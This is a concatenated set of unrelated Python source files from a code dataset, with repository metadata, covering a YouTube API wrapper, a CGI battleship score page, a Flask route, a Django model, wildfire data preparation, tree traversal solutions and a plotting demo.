| no_license | https://github.com/NicolasSimard/BlitzChat | 3e3d4b1c1ac5ed12082a43f04597bde42e0ebedc | c872c84927dc8df3b4bec119ef16f5af16fe4af5 | refs/heads/master | 2021-09-09T00:17:25.053332 | 2018-03-12T20:35:18 | 2018-03-12T20:35:18 | 116,960,842 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | class LiveBroadcast:
""" A LiveBroadcast object represents a Youtube live broadcast. It corresponds to a Youtube liveBroadcast ressource (see https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource)
Attributes:
client: An authenticated youtube service.
id: The live boradcast's id.
title: The title of the live broadcast.
published_at: Time at which the livebroadcast was published.
livechat_id: The id if the associated live chat.
Methods:
get_livechat: Returns the associated LiveChat object
"""
def __init__(self, ressource):
""" Initialize the live broadcast from
a Youtube liveBroadcast ressource.
"""
self.ressource = ressource
@property
def id(self):
return self.ressource['id']
@property
def name(self):
""" Return the name of the live broadcast. """
return self.title
@property
def title(self):
""" Return the title of the live broadcast. """
return self.ressource['snippet']['title']
@property
def published_at(self):
""" Return the moment at which the live broadcast started. """
return self.ressource['snippet']['publishedAt']
@property
def livechat_id(self):
return self.ressource['snippet'].get('liveChatId', None)
def __repr__(self):
return self.ressource
def __str__(self):
return "Live broadcast {}.".format(self.title) | UTF-8 | Python | false | false | 1,498 | py | 17 | livebroadcast.py | 14 | 0.637517 | 0.636849 | 0 | 52 | 27.826923 | 200 |
fluffyowl/past-submissions | 10,522,669,878,399 | e1121a30aa0abd72156f84bf22c760e6e9a8b267 | 048df2b4dc5ad153a36afad33831017800b9b9c7 | /atcoder/agc003/agc003_b.py | 8fcb08584d7cb37a29913fdc1da9c00073e9861b | []
| no_license | https://github.com/fluffyowl/past-submissions | a73e8f5157c647634668c200cd977f4428c6ac7d | 24706da1f79e5595b2f9f2583c736135ea055eb7 | refs/heads/master | 2022-02-21T06:32:43.156817 | 2019-09-16T00:17:50 | 2019-09-16T00:17:50 | 71,639,325 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | N = input()
cards = [int(raw_input()) for i in xrange(N)]
ans = cards[0] / 2
cards[0] %= 2
for i in xrange(1, N):
if cards[i] != 0 and cards[i-1] != 0:
cards[i] -= 1
ans += 1
ans += cards[i]/2
cards[i] %= 2
print ans
| UTF-8 | Python | false | false | 247 | py | 1,916 | agc003_b.py | 1,075 | 0.493927 | 0.445344 | 0 | 13 | 18 | 45 |
davidwchung/GatorTrader | 16,612,933,518,777 | 6acf0adb0d0badfd3f632f80e5c295e20723f40d | e8da654734204192dabf27d22f08840d120196d4 | /application/server/routes/users.py | c08d322204f3a3406953e495b7f6930796da235f | [
"MIT"
]
| permissive | https://github.com/davidwchung/GatorTrader | 74710533cf52735f77b1335e2ad9ffabb69b42ed | 73b3abc64a313534658c2fcbb3826009e162a07d | refs/heads/master | 2023-03-23T07:37:06.791582 | 2020-06-12T23:10:00 | 2020-06-12T23:10:00 | 271,899,430 | 0 | 0 | MIT | false | 2021-03-20T04:11:58 | 2020-06-12T22:16:52 | 2020-06-12T23:10:07 | 2021-03-20T04:11:57 | 5,980 | 0 | 0 | 1 | HTML | false | false | from flask import Blueprint, send_from_directory, render_template
users_blueprint = Blueprint('users_server',
__name__,
static_folder='../client',
template_folder='../client/public/users')
@users_blueprint.route('/users/<path:name>', methods=["GET", "POST"])
def render_users(name):
return render_template('/{}.html'.format(name)) | UTF-8 | Python | false | false | 421 | py | 79 | users.py | 29 | 0.570071 | 0.570071 | 0 | 11 | 37.363636 | 69 |
adarsh01-debug/KnowYourGame | 7,121,055,802,074 | eadb2ecfcb93878f0f901e9c4fcd89a2c8b1986e | ddeaab21955f1968e024a0e537f73cb48ab8a726 | /GameReq/ReqApp/models.py | a44db84a54c8350efa4da22c72a30fbae87b5a67 | []
| no_license | https://github.com/adarsh01-debug/KnowYourGame | 9a9d44a01feccd249714df5095dd7387e0c932f0 | 7d9b28d0fa0805825b0c11b9eef3554d512a8362 | refs/heads/main | 2023-02-27T17:35:46.342818 | 2021-02-07T08:18:45 | 2021-02-07T08:18:45 | 336,737,806 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from django.db import models
# Create your models here.
class Requirements(models.Model):
img = models.ImageField(upload_to='pics')
name = models.CharField(max_length=50)
CPU = models.TextField(max_length=100)
RAM = models.CharField(max_length=50)
GPU = models.TextField(max_length=100)
HDD = models.TextField(max_length=100)
OS = models.TextField(max_length=100)
def __str__(self):
return self.name
| UTF-8 | Python | false | false | 442 | py | 10 | models.py | 8 | 0.690045 | 0.653846 | 0 | 14 | 30.571429 | 45 |
fykx/fykx-geo | 4,526,895,536,387 | d0c6b5f5668976a04721706c80cc7ea805fe28e1 | f80fd1a3bd09c517a80d65b59fed5dfa7a2cd560 | /test.py | a05cd779ede973f1f5db2597768a563d9b1e7703 | [
"MIT"
]
| permissive | https://github.com/fykx/fykx-geo | f120098321153c3085836c451b802d9a8f6cfbcf | 24ea5ea52595389c51944c600b77f59045fbeeb6 | refs/heads/master | 2023-01-08T14:24:08.574353 | 2020-11-03T08:34:46 | 2020-11-03T08:34:46 | 305,695,113 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from fykx.f3DAnalyst import raster_extent
def listdatas(pathin):
import os
_datas = []
_names = []
for _root, _dirs, _files in os.walk(pathin):
if len(_files) != 0:
for _file in _files:
_names.append(_file.split("_")[0])
_vv = None
if _file.endswith('.tif'):
_vv = os.path.join(_root, _file)
_datas.append(_vv)
_mosaic_datas = []
for _name in list(set(_names)):
for _data in _datas:
if _data.split('/')[-1].split('_')[0] == _name:
_mosaic_datas.append(_data)
break
return _mosaic_datas
def main():
pathin = r'/mnt/e/r1'
pathout = r'/mnt/e/r1/out'
datas = listdatas(pathin)
for data in datas:
raster_extent(data, pathout)
return
if __name__ == '__main__':
main()
| UTF-8 | Python | false | false | 904 | py | 7 | test.py | 6 | 0.474558 | 0.466814 | 0 | 37 | 23.405405 | 59 |
milkyway007/BattleShip-2 | 7,206,955,154,302 | 9568c733a046acd090fd609af49407e52406b6b1 | d49a9b1410f2755bb13d1725ef36adb4f89e12e3 | /cgi-bin/second.cgi | be4015677d835c148555476e03b332b62ad576d3 | []
| no_license | https://github.com/milkyway007/BattleShip-2 | b987ead6b87209d06bd27cd6e166e32a07045283 | 23de495060d96bd4aebfd36923fac7949fd7d1ea | refs/heads/master | 2020-02-29T14:51:12.524277 | 2016-09-30T12:19:17 | 2016-09-30T12:19:17 | 69,613,894 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/python
import cgi
import cgitb
import datetime
import operator
from operator import itemgetter
from decimal import Decimal
import re
cgitb.enable()
print "Content-type: text/html"
print
form=cgi.FieldStorage()
timestamp = ''
playerOne = ''
playerTwo = ''
pointsOne = ''
pointsTwo = ''
gameTime = ''
winner=''
list = []
sortval = ''
def printHeader(dir):
message = "History of Games"
print "<h3>" + message.upper() + "</h3>"
print '<table>'
print "<tr>"
print '<th>NR</th>'
print '<th><a href=\'?sort=timestamp&dir=' + dir + '\'>DATE/TIME</th>'
print '<th><a href=\'?sort=winner&dir=' + dir + '\'>WINNER</th>'
print '<th><a href=\'?sort=playerOne&dir=' + dir + '\'>PLAYER A</th>'
print '<th><a href=\'?sort=playerTwo&dir=' + dir + '\'>PLAYER B</th>'
print '<th><a href=\'?sort=pointsOne&dir=' + dir + '\'>POINTS A</th>'
print '<th><a href=\'?sort=pointsTwo&dir=' + dir + '\'>POINTS B</th>'
print '<th><a href=\'?sort=duration&dir=' + dir + '\'>DURATION</th>'
print "</tr>"
def printHeaderForSortedResults(dir, player):
message = "History of Games"
print "<h3>" + message.upper() + "</h3>"
print '<table>'
print "<tr>"
print '<th>NR</th>'
print '<th><a href=\'?sort=timestamp&dir=' + dir + '&filterBy=' + player + '\'>DATE/TIME</th>'
print '<th><a href=\'?sort=winner&dir=' + dir + '&filterBy=' + player + '\'>WINNER</th>'
print '<th><a href=\'?sort=playerOne&dir=' + dir + '&filterBy=' + player + '\'>PLAYER A</th>'
print '<th><a href=\'?sort=playerTwo&dir=' + dir + '&filterBy=' + player + '\'>PLAYER B</th>'
print '<th><a href=\'?sort=pointsOne&dir=' + dir + '&filterBy=' + player + '\'>POINTS A</th>'
print '<th><a href=\'?sort=pointsTwo&dir=' + dir + '&filterBy=' + player + '\'>POINTS B</th>'
print '<th><a href=\'?sort=duration&dir=' + dir + '&filterBy=' + player + '\'>DURATION</th>'
print "</tr>"
def findFormValueByKey(keyValue):
variable = ''
if form.has_key(keyValue):
variable=form[keyValue].value
return variable
def writeData():
timestamp=findFormValueByKey("timestamp")
winner=findFormValueByKey("winnerForCGI")
playerOne=findFormValueByKey("playerOne")
playerTwo=findFormValueByKey("playerTwo")
pointsOne=findFormValueByKey("pointsOne")
pointsTwo=findFormValueByKey("pointsTwo")
gameTime=findFormValueByKey("gameTimeTwo")
open('file', 'a').close
f = open('file', 'r')
for line in f:
if not line:
continue
line = line.strip()
s = line.split(",")
list.append(s)
f.close()
number = len(list) + 1
data = str(number) + ',' + timestamp + ','+ winner + ','+ playerOne + ',' + playerTwo + ',' + pointsOne + ',' + pointsTwo + ',' + gameTime + '\n'
f = open('file', 'a')
f.write(data)
f.close()
def getCapOfHTML(fileName):
x = open(fileName, 'r')
cap=x.read()
x.close()
return cap
def printEndOfHTML():
knopka = "go back"
link = "http://dijkstra.cs.ttu.ee/~Liidia.Laada/prax3/single.html"
print '<a href="' + link + '" id="back">' + knopka.upper() + '</a>'
print "</body>"
print "</html>"
def processLine(line):
line = line.strip()
s = line.split(",")
list.append(s)
return s
def composeTableData(sth):
s = '<td>' + sth + '</td>'
return s
def readData():
print getCapOfHTML('../prax3/history.html')
printHeader("up")
open('file', 'a').close
f = open('file', 'r')
for line in f:
if not line:
continue
print "<tr>"
s = processLine(line)
for el in s:
print composeTableData(el.strip())
print "</tr>"
f.close()
print "</table>"
printEndOfHTML()
def sortData():
sortval = form['sort'].value
playerName = playerOne=findFormValueByKey("filterBy")
num = 0
if sortval == 'timestamp':
num = 1
if sortval == 'winner':
num = 2
if sortval == 'playerOne':
num = 3
if sortval == 'playerTwo':
num = 4
if sortval == 'pointsOne':
num = 5
if sortval == 'pointsTwo':
num = 6
if sortval == 'duration':
num = 7
oneMoreList = []
for s in list:
newS = makeNewArray(s)
oneMoreList.append(newS)
direction = form['dir'].value
newList = []
oppositeDirection = False
if direction == 'up':
newList = sortList(num, oneMoreList,oppositeDirection)
direction='down'
elif direction == 'down':
oppositeDirection = True
newList = sortList(num, oneMoreList,oppositeDirection)
direction='up'
print getCapOfHTML('../prax3/history.html')
if form.has_key("filterBy"):
printHeaderForSortedResults(direction, playerName)
else:
printHeader(direction)
for n in newList:
print "<tr>"
for el in n:
newWord = ''
for word in el:
newWord += str(word)
print composeTableData(newWord)
print "</tr>"
print "</table>"
printEndOfHTML()
def sortList(num, listA, oppositeDirection):
listB = []
if num==1:
listB = sorted(listA, key=lambda x: convertToDateTime(x[1]), reverse = oppositeDirection)
elif num==3 or num==4:
listB = sorted(listA, key=lambda x: convertToNormalStr(x[num]), reverse = oppositeDirection)
elif num==7:
listB = sorted(listA, key=lambda x: convertToDecimal(x[7]), reverse = oppositeDirection)
else:
listB = sorted(listA, key=itemgetter(num), reverse = oppositeDirection)
return listB
def convertToDecimal(array):
normStr = ''
for part in array:
normStr += str(part)
normDec = Decimal(normStr)
return normDec
def convertToDateTime(array):
day=str(array[0])
month=str(array[2])
year=str(array[4])
hour=str(array[6])
min=str(array[8])
dateStr = year + "-" + month + "-" + day + "-" + hour + "-" + min
DTObj = datetime.datetime.strptime(dateStr, '%Y-%m-%d-%H-%M')
return DTObj
def convertToNormalStr(array):
changedArray = []
for part in array:
if type(part) == str:
changedArray.append(part.lower())
else:
changedArray.append(part)
return changedArray
def makeNewArray(array):
newArray = []
for s in array:
newS = makeArray(s)
newArray.append(newS)
return newArray
def makeArray(word):
parts = re.findall(r"[^\W\d_]+|\d+|[.,:\s]+", word)
newParts = []
for p in parts:
newP = convert(p)
newParts.append(newP)
return newParts
def convert(symbol):
if symbol.isdigit():
symbol = int(symbol)
else:
symbol = symbol
return symbol
def showGame():
gameFile = open("../prax3/index.html", "read")
toShow = gameFile.read()
gameFile.close()
print toShow
def showMessage():
first_line = ''
f = open('file', 'r')
lines = f.readlines()
first_line = lines[-1]
first_line = first_line.strip()
first_line = first_line.split(",")
f.close()
print getCapOfHTML('../prax3/score.html')
print "<div>GAME OVER!</div>"
print "<div>"
winner = first_line[2]
winnerName = ''
if winner == 'Player':
winnerName = first_line[3]
elif winner == 'Computer':
winnerName = first_line[4]
print winnerName.title()
print " won!</div>"
print "<div>Score of the game:</div>"
print "<table>"
print "<tr>"
message = "Winner"
print "<th>"+message.upper()+"</th>"
message = first_line[3].upper()
print "<th>"+message.upper()+"</th>"
message = first_line[4].upper()
print "<th>"+message.upper()+"</th>"
message = "TIME(IN SECONDS)"
print "<th>"+message.upper()+"</th>"
print "</tr>"
print "<tr>"
print "<td>"
print winnerName.title()
print "</td>"
print "<td>"
print first_line[5]
print "</td>"
print "<td>"
print first_line[6]
print "</td>"
print "<td>"
print first_line[7]
print "</td>"
print "</tr>"
print "</table>"
printEndOfHTML()
def startFilteringData():
print getCapOfHTML('../prax3/filter.html')
def filterGames():
playerOne=findFormValueByKey("playerOne")
print getCapOfHTML('../prax3/history.html')
printHeaderForSortedResults("up", playerOne)
open('file', 'a').close
f = open('file', 'r')
for line in f:
if not line:
continue
line = line.strip()
s = line.split(",")
name = s[3]
name = name.strip()
if name == playerOne:
print "<tr>"
list.append(s)
for el in s:
print composeTableData(el.strip())
print "</tr>"
f.close()
print "</table>"
printEndOfHTML()
def main():
if form.has_key("sort"):
if form.has_key("filterBy"):
playerOne=findFormValueByKey("filterBy")
f = open('file', 'r')
for line in f:
if not line:
continue
s = line.split(",")
name = s[3]
name = name.strip()
if name == playerOne:
list.append(s)
f.close()
else:
f = open('file', 'r')
for line in f:
if not line:
continue
s = processLine(line)
f.close()
sortData()
elif form.has_key("action") and form["action"].value=="write":
writeData()
showMessage()
elif form.has_key("action") and form["action"].value=="showHistory":
readData()
elif form.has_key("action") and form["action"].value=="filter":
startFilteringData()
elif form.has_key("filterGames") and form["filterGames"].value=="ok":
filterGames()
main()
| UTF-8 | Python | false | false | 8,741 | cgi | 16 | second.cgi | 7 | 0.63368 | 0.628875 | 0 | 371 | 22.555256 | 146 |
prescottsmith/Wildfires_2.0 | 14,379,550,535,361 | c00e4a420910ceee4e2a1e81398562e53ec05711 | 86961fba34ad9f9cc157f5a7c92f17e350ba4ca4 | /ref_data_setup.py | 7d45e0becea3270b4d5fa4d2b7923ebce36d74d5 | []
| no_license | https://github.com/prescottsmith/Wildfires_2.0 | bc450c689a6aa1c67b7f0ae84a5a6169ccafadbd | 8b3408e2f91b82823439a71685eeea7fd442cdc9 | refs/heads/main | 2023-01-01T00:45:39.094037 | 2020-10-19T12:03:53 | 2020-10-19T12:03:53 | 301,131,578 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #import kaggle utilities
#from kaggle.api.kaggle_api_extended import KaggleApi
import os
import datetime
import os.path
from os import path
from datetime import timedelta
import pandas as pd
owd = os.getcwd()
#Check if file/directory exists
def file_check(filepath):
result = os.path.exists(filepath)
return result
#Download Dataset from Kaggle
#def dataset_download():
#Authenticate with API Server
# api = KaggleApi()
# api.authenticate()
#Select kaggle page and specfic file to download
# page = 'rtatman/188-million-us-wildfires'
# page_file = 'FPA_FOD_20170508.sqlite'
# api.dataset_download_files(page, page_file)
#unzip sqlite file
# path_to_zip_file = 'FPA_FOD_20170508.sqlite/188-million-us-wildfires.zip'
# import zipfile
# with zipfile.ZipFile(path_to_zip_file, 'r') as zip_ref:
# zip_ref.extractall('FPA_FOD_20170508.sqlite/')
# # Connect to SQLite database and import Fires table
# import sqlite3
# import pandas as pd
# conn = None
# conn = sqlite3.connect('FPA_FOD_20170508.sqlite/FPA_FOD_20170508.sqlite')
# cur = conn.cursor()
# raw_df = pd.read_sql("""SELECT LATITUDE, LONGITUDE, FIRE_YEAR, DISCOVERY_DOY, STAT_CAUSE_DESCR, FIRE_SIZE_CLASS FROM fires WHERE FIRE_YEAR >2013""", con=conn)
# conn.close()
# raw_df.to_csv(r'2014-2015_raw.csv', index = False, header=True)
# delete downloaded sqlite file/folder
# import shutil
# shutil.rmtree(page_file)
# Define test_train_splits
def test_train_split(dataframe):
"""Split dataframe into train and test data. Returns Train 1st, Test 2nd"""
train = dataframe.sample(frac=0.8, random_state=100) # random state is a seed value
train = train.reset_index(drop=True)
test = dataframe.drop(train.index)
test = test.reset_index(drop=True)
return train, test
#fix issue with stat_cause spellings for folder assignment
def string_fixer(word):
new_word = word.replace(' ', '_')
new_word = new_word.replace('/', '_')
return new_word
#Boundaries defined for sentinel API requests (WIDTH & LENGTH ASSIGNED HERE)
def bbox_boundaries(dataframe):
boundaries = []
for i in range(len(dataframe)):
long = dataframe['LONGITUDE'][i]
lat = dataframe['LATITUDE'][i]
long_left = long - 0.026
long_right = long + 0.026
lat_bottom = lat - 0.018
lat_top = lat + 0.018
bound_list = [round(long_left, 5), round(lat_bottom, 5), round(long_right, 5), round(lat_top, 5)]
boundaries.append(bound_list)
dataframe['BBOX'] = boundaries
return dataframe
def add_date(dataframe):
new_dates = []
for i in range(len(dataframe)):
start_date = str(dataframe['FIRE_YEAR'][i]) + '-1-1'
DOY = dataframe['DISCOVERY_DOY'][i]
Date = datetime.datetime.strptime(start_date, '%Y-%m-%d')+ timedelta(float(DOY))
new_dates.append(Date.date())
dataframe['Date'] = new_dates
return dataframe
def cause_fixer(dataframe):
new_strings = []
for word in dataframe['STAT_CAUSE_DESCR']:
new_word = string_fixer(word)
new_strings.append(new_word)
dataframe['STAT_CAUSE_DESCR'] = new_strings
return dataframe
def reformatting(dataframe):
df = bbox_boundaries(dataframe)
df = add_date(df)
df = cause_fixer(df)
return df
def cause_splitter(dataframe, causes):
for cause in causes:
os.chdir(owd+'/Data')
if file_check(cause):
print("'"+str(cause)+"' "+"folder already exists")
else:
os.makedirs(cause)
print("'" + str(cause) + "' " + "folder created")
cause_df = dataframe[dataframe['STAT_CAUSE_DESCR']==cause]
cause_df = cause_df.reset_index(drop=True)
cause_df_train, cause_df_test = test_train_split(cause_df)
os.chdir(cause)
try:
os.makedirs('train')
print('Created train folder')
except:
print('train folder already created')
try:
os.makedirs('test')
print('Created test folder')
except:
print('test folder already created')
fixed_cause = string_fixer(cause)
train_path = 'train/'+str(fixed_cause)+'_2014_2015_train.csv'
test_path = 'test/'+str(fixed_cause)+'_2014_2015_test.csv'
cause_df_train.to_csv(train_path)
cause_df_test.to_csv(test_path)
print('Train and Test data saved in '+str(cause)+' folder')
return
def main_function():
owd = os.getcwd()
downloaded = file_check('2014-2015_raw.csv')
try:
os.makedirs('Data')
print('Data folder created')
except:
print('Data folder already exists')
os.chdir('Data')
if downloaded:
print('Reference data table has already been downloaded')
else:
print('Error')
exit()
#print('Reference data table has not been downloaded yet')
#print('Downloading now...')
#dataset_download()
#print('Reference data table downloaded')
os.chdir(owd)
raw_df = pd.read_csv('2014-2015_raw.csv')
df = reformatting(raw_df)
list_of_causes = set(df['STAT_CAUSE_DESCR'])
cause_splitter(df, list_of_causes)
os.chdir(owd)
print(' ')
print('Reference data is ready for Sentinel imagery download')
if __name__ == '__main__':
main_function()
| UTF-8 | Python | false | false | 5,392 | py | 33 | ref_data_setup.py | 6 | 0.631862 | 0.609421 | 0 | 182 | 28.626374 | 163 |
rayjay214/mini-lbs-platform | 12,429,635,375,534 | 474582f288b95c6d6dd1e69ab99806697d2ab751 | 250ad0e55decc4385235bf1c3136427db7d5c291 | /backend/cmd_handler/bin/cmd_handler.py | 5dd7cc341f5ec88ae56c3c94ffb9e5f9e217fce2 | []
| no_license | https://github.com/rayjay214/mini-lbs-platform | 09db143ce49307333a50300796a566d16e03c358 | 6bcca7c38d1e96fed63c2e80ae4a5c17888d90cc | refs/heads/master | 2020-11-29T06:59:45.020812 | 2020-03-11T06:34:04 | 2020-03-11T06:34:04 | 230,051,200 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import json
import sys
import threading
import queue
import time
from confluent_kafka import Producer, Consumer
from globals import g_logger, g_cfg
from dev_pb2 import DownDevMsg, MsgType, UpDevMsg
from redis_op import RedisOp
import struct
def num_to_bcd(num):
packed = struct.pack('6B', *[(num // 10 ** i % 10 << 4) + (num // 10 ** (i - 1) % 10) for i in range(11, -1, -2)])
# print(''.join(f"\\{p:02x}" for p in packed))
return packed
def pack_char(character):
return struct.pack('c', character.to_bytes(1, byteorder='big'))
def pack_signed_char(character):
return struct.pack('b', character)
def xor_bytes(byteStr): # 按字节异或
if len(byteStr) == 1:
return byteStr
result = (struct.unpack('b', pack_char(byteStr[0])))[0] # 字符转成 signed char(对应python中的 int ) 后进行异或
for c in byteStr[1:]:
signed_c = (struct.unpack('b', pack_char(c)))[0]
result = result ^ signed_c
return pack_signed_char(result)
#consume cmd.content from web_bo
class CmdReqConsumer(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.consumer = Consumer({
'bootstrap.servers': g_cfg['kafka']['broker'],
'group.id': g_cfg['kafka']['group'],
'auto.offset.reset': 'earliest'})
self.queue = queue
self.counter = 1
def get_parser(self, protocol):
return {
't808' : self.t808_parser
}.get(protocol, None)
def trans0x7e(self, b_str):
b_dst = bytearray(1024)
b_dst[0] = b_str[0]
idx = 1
for ele in b_str[1:-1]:
if ele == 0x7e:
b_dst[idx] = 0x7d
idx += 1
b_dst[idx] = 0x02
idx += 1
elif ele == 0x7d:
b_dst[idx] = 0x7d
idx += 1
b_dst[idx] = 0x01
idx += 1
else:
b_dst[idx] = ele
idx += 1
b_dst[idx] = b_str[-1]
idx += 1
b_final = bytes(b_dst[:idx])
return b_final
def t808_parser(self, down_devmsg):
buf = bytearray(1024)
buf_idx = 0
struct.pack_into('>B', buf, buf_idx, 0x7e)
buf_idx += 1
struct.pack_into('>H', buf, buf_idx, 0x8300)
buf_idx += 2
struct.pack_into('>H', buf, buf_idx, len(down_devmsg.cmdreq.content.encode()))
buf_idx += 2
ba_phone = num_to_bcd(int(down_devmsg.cmdreq.imei))
struct.pack_into('>6s', buf, buf_idx, ba_phone)
buf_idx += 6
struct.pack_into('>H', buf, buf_idx, self.counter)
self.counter += 1
buf_idx += 2
struct.pack_into('>B', buf, buf_idx, 0x01)
buf_idx += 1
struct.pack_into('>{}s'.format(len(down_devmsg.cmdreq.content.encode())),
buf, buf_idx, down_devmsg.cmdreq.content.encode())
buf_idx += len(down_devmsg.cmdreq.content.encode())
xor = xor_bytes(buf[1:buf_idx])
struct.pack_into('>1s', buf, buf_idx, xor)
buf_idx += 1
struct.pack_into('>B', buf, buf_idx, 0x7e)
b_str = buf[:buf_idx + 1]
b_final = self.trans0x7e(b_str)
down_devmsg.comreq.content = b_final
print(down_devmsg)
def get_protocol_by_type(self, product_type):
for key in g_cfg['protocol']:
types = g_cfg['protocol'][key].split(',')
if product_type in types:
return key
return None
def process_msg(self, msg):
down_devmsg = DownDevMsg()
down_devmsg.ParseFromString(msg)
g_logger.info(down_devmsg)
redis_op = RedisOp(g_cfg['redis'])
dev_info = redis_op.getDeviceInfoByImei(down_devmsg.cmdreq.imei)
protocol = self.get_protocol_by_type(dev_info['product_type'])
if protocol is None:
g_logger.error('protocol not found, type:{}'.format(dev_info['product_type']))
return
parser = self.get_parser(protocol)
if parser is None:
g_logger.error('parser not found, protocol {}'.format(protocol))
return
parser(down_devmsg)
def run(self):
topics = []
topics.append(g_cfg['kafka']['cmdreq_topic'])
self.consumer.subscribe(topics)
while True:
try:
msg = self.consumer.poll(1)
if msg is None:
continue
if msg.error():
g_logger.info("Consumer error: {}".format(msg.error()))
continue
self.process_msg(msg.value())
except Exception as e:
g_logger.error(e)
self.consumer.close()
#consume cmd.resp from gw
class CmdRespConsumer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.consumer = Consumer({
'bootstrap.servers': g_cfg['kafka']['broker'],
'group.id': g_cfg['kafka']['group'],
'auto.offset.reset': 'earliest'})
def process_msg(self, str):
updev_msg = UpDevMsg()
updev_msg.pasreFromString(str)
print(updev_msg)
def run(self):
self.consumer.subscribe(list(g_cfg['kafka']['cmdresp_topic']))
while True:
try:
msg = self.consumer.poll(1)
if msg is None:
continue
if msg.error():
g_logger.info("Consumer error: {}".format(msg.error()))
continue
g_logger.info('Received message: {}'.format(msg.value().decode('utf-8')))
self.process_msg(msg.value())
except Exception as e:
g_logger.error(e)
self.consumer.close()
#after constructing binary
class CmdProducer(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
self.producer = Producer({'bootstrap.servers': g_cfg['kafka']['broker']})
def run(self):
while True:
self.producer.poll(0)
event = self.queue.get()
if event is None:
time.sleep(0.1)
self.process_event(event)
self.queue.task_done()
def delivery_report(self, err, msg):
if err is not None:
g_logger.info('Message delivery failed: {}'.format(err))
else:
g_logger.info('Message delivered to {} [{}]'.format(msg.topic(), msg.partition()))
def process_msg(self, msg):
topic = self.setting.get(g_cfg['kafka']['cmd_binaryreq_topic'])
g_logger.info(msg)
self.producer.produce(topic, msg, callback=self.delivery_report)
| UTF-8 | Python | false | false | 6,762 | py | 161 | cmd_handler.py | 135 | 0.539125 | 0.523802 | 0 | 200 | 32.605 | 118 |
mueller14003/DM1-Python | 2,886,218,052,525 | 0c7cf6a56875d2e8e996256092e15586a61b5a65 | 5488cae78a03828aab7884ba2b0cf0e6b0eb1a64 | /vectors.py | 0658eea591dbaafe659a4b4125c20248c78f753f | []
| no_license | https://github.com/mueller14003/DM1-Python | f28c863fadfc5e6f51bee98180ba0fc8bfcd308a | 1c59cdaa974e53993576a3820ebae7614d39df5f | refs/heads/master | 2021-04-09T15:38:29.669722 | 2018-08-02T06:24:56 | 2018-08-02T06:24:56 | 125,588,790 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from math import *
i=6.6
j=2.6
m=6.5**2
magnitude=sqrt(((i*m)**2)+((j*m)**2))
print(magnitude) | UTF-8 | Python | false | false | 97 | py | 78 | vectors.py | 78 | 0.587629 | 0.494845 | 0 | 9 | 9.888889 | 37 |
pradoz/leetcode_pset | 4,088,808,901,790 | 9169ec90af5971786ccefd520831690bc5fa800d | 7ec1f76d7be4452fcc0507315cb3494c53124e9f | /py/n-ary-tree-postorder-traversal.py | f9c02487af5f8f67c2e370a0158a9310b0b6f8ee | []
| no_license | https://github.com/pradoz/leetcode_pset | 0939468fc5bac8256ed148b09eb0e0d79b146fea | 31fa2a9e2f4bee8eadd4670c6f2ceefd7a164a0c | refs/heads/master | 2023-05-05T07:37:02.393264 | 2021-05-20T17:08:15 | 2021-05-20T17:08:15 | 204,830,939 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | """
# Definition for a Node.
class Node:
def __init__(self, val, children):
self.val = val
self.children = children
"""
# Recursively
class Solution:
def postorder(self, root: 'Node') -> List[int]:
if not root:
return []
if root.children is None:
return [root.val]
result = []
res = []
for child in root.children:
res += self.postorder(child)
result += res
result.append(root.val)
return result
# Iteratively
class Solution:
def postorder(self, root: 'Node') -> List[int]:
stack = [root]
res = []
while stack and root:
n = stack.pop()
res.insert(0, n.val)
stack += n.children
return res
# Recursively with post_order_traversal function
class Solution:
def postorder(self, root: 'Node') -> List[int]:
res = []
def post_order_traversal(node: 'Node') -> None:
if not node:
return
for child in node.children:
post_order_traversal(child)
res.append(node.val)
post_order_traversal(root)
return res
# Iteratively with helper function to minimize work
class Solution:
def postorder(self, root: 'Node') -> List[int]:
res = []
def traverse_and_check(x: 'Node'):
# lets us reference it outside the scope without
# passing it as a parameter
nonlocal res
if x:
# if x has no children, just append x's val
if not x.children:
res.append(x.val)
else: # else append every child for every child
for child in x.children:
traverse_and_check(child)
res.append(x.val)
# End of traverse_and_check()
if root:
traverse_and_check(root)
return res
| UTF-8 | Python | false | false | 1,974 | py | 213 | n-ary-tree-postorder-traversal.py | 209 | 0.518744 | 0.518237 | 0 | 70 | 27.071429 | 63 |
spacetelescope/stregion | 5,789,615,947,018 | c859c0d78ae2c866ed3d4947ab4b2c8cb3daa529 | 5808b177ca5c9a3a84f01603809781642d18cf45 | /examples/demo_region_filter01.py | 066e761c6ab56ed241072639219c42006557b16a | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | https://github.com/spacetelescope/stregion | 659ab8091adcfae9817de8ea4439c6b1b040839e | 96f032849e69345aa9c31a52811235a61c4c8c25 | refs/heads/master | 2022-11-28T15:46:00.471438 | 2022-11-28T12:36:15 | 2022-11-28T12:36:15 | 138,785,965 | 0 | 3 | MIT | false | 2022-11-25T20:24:49 | 2018-06-26T19:52:12 | 2022-11-17T20:20:31 | 2022-11-25T20:24:48 | 988 | 0 | 3 | 0 | Python | false | false | try:
from astropy.io import fits as pyfits
except ImportError:
from astropy.io import fits as pyfits
from demo_helper import pyfits_card_fromstring
import matplotlib.pyplot as plt
import stregion
# read in the image
def demo_header():
cards = pyfits.CardList()
for l in open("sample_fits02.header"):
card = pyfits_card_fromstring(l.strip())
cards.append(card)
h = pyfits.Header(cards)
return h
header = demo_header() # sample fits header
shape = (header["NAXIS1"], header["NAXIS2"])
reg_name = "test.reg"
r = stregion.open(reg_name).as_imagecoord(header)
m = r.get_mask(shape=shape)
fig = plt.figure(1, figsize=(7,5))
ax = plt.subplot(121)
plt.imshow(m, origin="lower")
patch_list, text_list = r.get_mpl_patches_texts()
for p in patch_list:
ax.add_patch(p)
for t in text_list:
ax.add_artist(t)
# another region
